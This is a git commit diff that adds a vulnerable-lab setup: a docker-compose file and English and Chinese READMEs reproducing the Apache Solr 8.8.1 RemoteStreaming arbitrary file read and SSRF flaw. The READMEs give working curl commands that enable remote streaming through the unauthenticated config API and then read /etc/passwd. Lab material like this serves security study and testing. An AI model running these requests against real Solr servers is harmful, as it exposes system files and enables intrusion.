first commit

2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
--- a/solr/Remote-Streaming-Fileread/1.png
+++ b/solr/Remote-Streaming-Fileread/1.png
--- a/solr/Remote-Streaming-Fileread/2.png
+++ b/solr/Remote-Streaming-Fileread/2.png
--- a/solr/Remote-Streaming-Fileread/3.png
+++ b/solr/Remote-Streaming-Fileread/3.png
--- a/solr/Remote-Streaming-Fileread/README.md
+++ b/solr/Remote-Streaming-Fileread/README.md
@@ -0,0 +1,43 @@
+# Apache Solr RemoteStreaming Arbitrary File Reading and SSRF
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache Solr is an open-source search server. When Apache Solr does not have authentication enabled, an attacker can craft a request to enable specific configurations, potentially leading to Server-Side Request Forgery (SSRF) or arbitrary file reading vulnerabilities.
+
+References:
+
+- <https://mp.weixin.qq.com/s/3WuWUGO61gM0dBpwqTfenQ>
+
+## Environment Setup
+
+Execute the following command to start an Apache Solr 8.8.1 server:
+
+```
+docker compose up -d
+```
+
+After the server starts, you can access the Apache Solr management interface at `http://your-ip:8983/`.
+
+## Vulnerability Reproduction
+
+First, visit `http://your-ip:8983/solr/admin/cores?indexInfo=false&wt=json` to extract the database name:
+
+![](1.png)
+
+Send the following request to modify the configuration of the `demo` core and enable `RemoteStreaming`:
+
+```
+curl -i -s -k -X $'POST' \
+     -H $'Content-Type: application/json' --data-binary $'{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}' \
+     $'http://your-ip:8983/solr/demo/config'
+```
+
+![](2.png)
+
+Then, you can read arbitrary files through the `stream.url` parameter:
+
+```
+curl -i -s -k 'http://your-ip:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'
+```
+
+![](3.png)
--- a/solr/Remote-Streaming-Fileread/README.zh-cn.md
+++ b/solr/Remote-Streaming-Fileread/README.zh-cn.md
@@ -0,0 +1,41 @@
+# Apache Solr RemoteStreaming 任意文件读取和SSRF漏洞
+
+Apache Solr 是一个开源的搜索服务器。当 Apache Solr 未启用身份认证时，攻击者可以构造请求来启用特定配置，从而可能导致服务器端请求伪造（SSRF）或任意文件读取漏洞。
+
+参考链接：
+
+- <https://mp.weixin.qq.com/s/3WuWUGO61gM0dBpwqTfenQ>
+
+## 环境搭建
+
+执行如下命令启动 Apache Solr 8.8.1 服务器：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问 `http://your-ip:8983/` 即可看到 Apache Solr 的管理界面。
+
+## 漏洞复现
+
+首先，访问`http://your-ip:8983/solr/admin/cores?indexInfo=false&wt=json`获取数据库名：
+
+![](1.png)
+
+发送以下请求来修改 `demo` 核心的配置并启用 `RemoteStreaming`：
+
+```
+curl -i -s -k -X $'POST' \
+     -H $'Content-Type: application/json' --data-binary $'{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}' \
+     $'http://your-ip:8983/solr/demo/config'
+```
+
+![](2.png)
+
+然后，你可以通过 `stream.url` 参数读取任意文件：
+
+```
+curl -i -s -k 'http://your-ip:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'
+```
+
+![](3.png)
--- a/solr/Remote-Streaming-Fileread/docker-compose.yml
+++ b/solr/Remote-Streaming-Fileread/docker-compose.yml
@@ -0,0 +1,6 @@
+services:
+ solr:
+   image: vulhub/solr:8.8.1
+   ports:
+    - "8983:8983"
+    - "5005:5005"